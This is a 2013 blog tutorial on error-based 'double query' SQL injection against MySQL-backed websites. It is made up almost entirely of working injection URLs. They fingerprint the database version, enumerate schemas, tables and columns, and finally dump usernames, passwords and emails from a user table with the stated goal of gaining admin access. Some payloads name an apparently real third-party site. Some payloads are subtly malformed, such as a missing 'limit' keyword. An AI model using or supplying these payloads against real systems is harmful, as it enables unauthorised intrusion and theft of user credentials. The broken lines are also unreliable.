Wednesday 2 January 2013

Error based sql injection tutorial - Double query injection

Lets start injection
What you need a vul site like this


Code:
www.site.com/artist.php?i=36

At first testing site for vul

Code:
www.site.com/artist.php?i=36'
we get error
[Image: erroryu.png]

Ok lets go inject this

Code:
www.site.com/artist.php?i=36 order by 10--  no error
www.site.com/artist.php?i=36 order by 20--  no error
www.site.com/artist.php?i=36 order by 50--  no error
www.site.com/artist.php?i=36 order by 100--    no error

So like string base lest try this

Code:
www.site.com/artist.php?i=36' order by 100--+

Now we have an error in columns
[Image: unknownd.png]

Now going to get columns
Code:
www.site.com/artist.php?i=36' order by 10--+    erro

www.site.com/artist.php?i=36' order by 8--+    error
www.site.com/artist.php?i=36' order by 6--+    error
www.site.com/artist.php?i=36' order by 5--+    no error

Ok find number of columns next step it using union to find vul column to inject there

Code:
www.site.com/artist.php?i=36' union select 1,2,3,4,5--+
As you see

Code:
The used SELECT statements have a different number of columns
[Image: unionr.png]

So what can we do trying another method like blind lets see it

Code:
www.site.com/artist.php?i=36' and 1=1--+    its true not get error from this
www.site.com/artist.php?i=36' and 1=2--+    its false and steal no erro
Whats now?
Are we should give up and find other site?
No,lets try other method called ERROR BASED INJECTION(DOUBLE QUERY)

In this method we use specific syntax for getting data from database

The code we use for getting version,database and aslo user like this

Code:
and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Now trying this syntax in our site

Code:

http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+[code]
[spoiler][img]http://img830.imageshack.us/img830/2218/81406053.png[/img]

Notice: We dont have to use this hex

Code:
0x7e,0x27
We can use the syntax without them and our code like this


Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select concat(version())) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

It work fine but there is another problem you should know it.When we erase the hex value from code result of it like

[Image: 24262231.png]

As you see we have foregner "1" near version name and it will stay for all our results thus it maybe get confuse some one whoe new start this type of injection.
In this tutorial I write all syntax with hex value.

[color=#800]Tip:[/color]If our targer use version 4 and lower than it we can use this syntax for getting version and database name look at this


Code:
http://www.kusuri.co.uk/view_product.php?id=242 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

[Image: version4l.png]
Dont worry
There is another code for this type of site you can find version and database and user of site the code is like this


Code:
or 1 group by concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2)) having min(0) or

Now trying this in site

Code:
http://www.kusuri.co.uk/view_product.php?id=242 or 1 group by concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2)) having min(0) or 1--+
[Image: ve4.png]

As you see in the pic version 4 and we can success to find it

Now we have have version and database and move on to inject our target
[Image: 13063360.png]

For extact how many database exist in site we to use another syntax like this one

Code:
and(select 1 from(select count(*),concat((select (select (select
concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Check results for our target

Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,count(schema_name),0x27,0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
[Image: 87804024jb.png]

Now with useing this code and replacing in limit we can find all DB

Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,concat(schema_name),0x27,0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

With replece in first limit we can get all requests from DB like this
Code:
limit 0,1   for first exicting things
limit 1,1  for two exicting things
  .
  .
  .  
limit N,1  for N exicting things


For getting tables from database I use this " table_schema=0x{hex-database-name} "
First take a look our picked DB have how many tables?

Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from information_schema.tables where table_schema=0x{hex-database-name} 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
[Image: nober.png]

Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,concat(table_name),0x27,0x7e) from information_schema.tables where table_schema=0x{hex-database-name} 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
[Image: tabeo.png]

By giveing a number for firs limit all table are count
I find table name " mass_users " And now we should exratct column name of this table to get gain admin access.

Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,count(column_name),0x27,0x7e) from information_schema.columns where table_schema=0x{hex-database-name} and table_name=0x6d6173735f7573657273 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
[Image: 21094341.png]

Only have five columns lets get it

Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,concat(column_name),0x27,0x7e) from information_schema.columns where table_schema=0x{hex-database-name} and table_name=0x6d6173735f7573657273 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
[img]img209.imageshack.us/img209/949/userb.png[/img]
[Image: passy.png]

All column are here
Code:
id,username,password,firstname,email

Last step extract the value of this columns

Code:
http://www.site.com/artist.php?i=36' and+(select 1 from(select+count(*),concat((select+concat(username,0x3a,password,0x3a,email) from mass_users+limit+0,1),floor(rand(0)*2))x from information_schema.tables+group by x)a) and 1=1--+

 

2 comments:

  1. Thank you i'm not tried it but i think it's nice tutorial bro.

    ReplyDelete
  2. Thank you i'm not tried it but i think it's nice tutorial bro.

    ReplyDelete